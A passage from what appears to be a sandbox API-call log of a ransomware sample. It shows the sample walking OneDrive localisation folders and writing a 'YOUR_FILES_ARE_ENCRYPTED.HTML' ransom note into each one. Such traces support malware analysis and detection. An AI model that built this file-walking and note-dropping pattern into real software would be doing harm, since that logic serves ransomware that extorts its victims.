hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52990592, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x52990592, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x52eedb83, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.036] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52eedb83, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x52eedb83, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x53935b56, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.036] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.036] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.036] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.036] lstrlenW (lpString=".mui") returned 4 [0113.036] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.036] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52eedb83, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x52eedb83, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x53935b56, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.036] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.036] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.036] GetProcessHeap () returned 0x600000 [0113.036] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\lv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.037] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.038] CloseHandle (hObject=0x32c) returned 1 [0113.038] GetProcessHeap () returned 0x600000 [0113.038] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.038] GetProcessHeap () returned 0x600000 [0113.038] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.038] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53b98171, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x53b98171, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x53b98171, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mi-nz", cAlternateFileName="")) returned 1 [0113.038] StrStrIW (lpFirst="mi-nz", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.038] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz") returned 81 [0113.038] GetProcessHeap () returned 0x600000 [0113.038] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.038] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz" [0113.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz\\*" [0113.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53b98171, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x53b98171, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x55a96ece, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.039] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53b98171, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x53b98171, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x55a96ece, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.039] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55a96ece, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55a96ece, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x55d1f366, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.039] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.039] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.039] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.039] lstrlenW (lpString=".mui") returned 4 [0113.039] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.039] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55a96ece, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55a96ece, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x55d1f366, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.039] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.039] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.039] GetProcessHeap () returned 0x600000 [0113.039] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\mi-nz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.040] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.041] CloseHandle (hObject=0x32c) returned 1 [0113.041] GetProcessHeap () returned 0x600000 [0113.041] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.041] GetProcessHeap () returned 0x600000 [0113.041] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.041] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55f81a48, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55f81a48, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x55f81a48, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mk", cAlternateFileName="")) returned 1 [0113.041] StrStrIW (lpFirst="mk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.041] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk") returned 78 [0113.041] GetProcessHeap () returned 0x600000 [0113.041] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.041] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk" [0113.041] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk\\*" [0113.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55f81a48, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55f81a48, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x562eeec6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.041] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55f81a48, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55f81a48, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x562eeec6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.041] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x562eeec6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x562eeec6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5668283e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.041] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.041] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.041] lstrlenW (lpString=".mui") returned 4 [0113.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.041] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x562eeec6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x562eeec6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5668283e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.041] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.042] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.042] GetProcessHeap () returned 0x600000 [0113.042] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\mk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.042] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.043] CloseHandle (hObject=0x32c) returned 1 [0113.043] GetProcessHeap () returned 0x600000 [0113.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.043] GetProcessHeap () returned 0x600000 [0113.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.044] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5678da05, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5678da05, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5678da05, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ml-in", cAlternateFileName="")) returned 1 [0113.044] StrStrIW (lpFirst="ml-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in") returned 81 [0113.044] GetProcessHeap () returned 0x600000 [0113.044] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.046] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in" [0113.046] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in\\*" [0113.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5678da05, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5678da05, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b938ba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.046] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5678da05, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5678da05, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b938ba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.046] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56b938ba, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b938ba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56f011c0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x186c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.047] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.047] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.047] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.047] lstrlenW (lpString=".mui") returned 4 [0113.047] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.047] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56b938ba, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b938ba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56f011c0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x186c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.047] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.047] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.047] GetProcessHeap () returned 0x600000 [0113.047] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ml-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.047] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.048] CloseHandle (hObject=0x32c) returned 1 [0113.048] GetProcessHeap () returned 0x600000 [0113.048] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.048] GetProcessHeap () returned 0x600000 [0113.048] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.049] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56fbfa3c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56fbfa3c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56fbfa3c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mn", cAlternateFileName="")) returned 1 [0113.049] StrStrIW (lpFirst="mn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.049] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn") returned 78 [0113.049] GetProcessHeap () returned 0x600000 [0113.049] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.049] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn" [0113.049] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn\\*" [0113.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56fbfa3c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56fbfa3c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x57438001, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626878 [0113.049] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56fbfa3c, ftCreationTime.dwHighDateTime=0x1d70071, 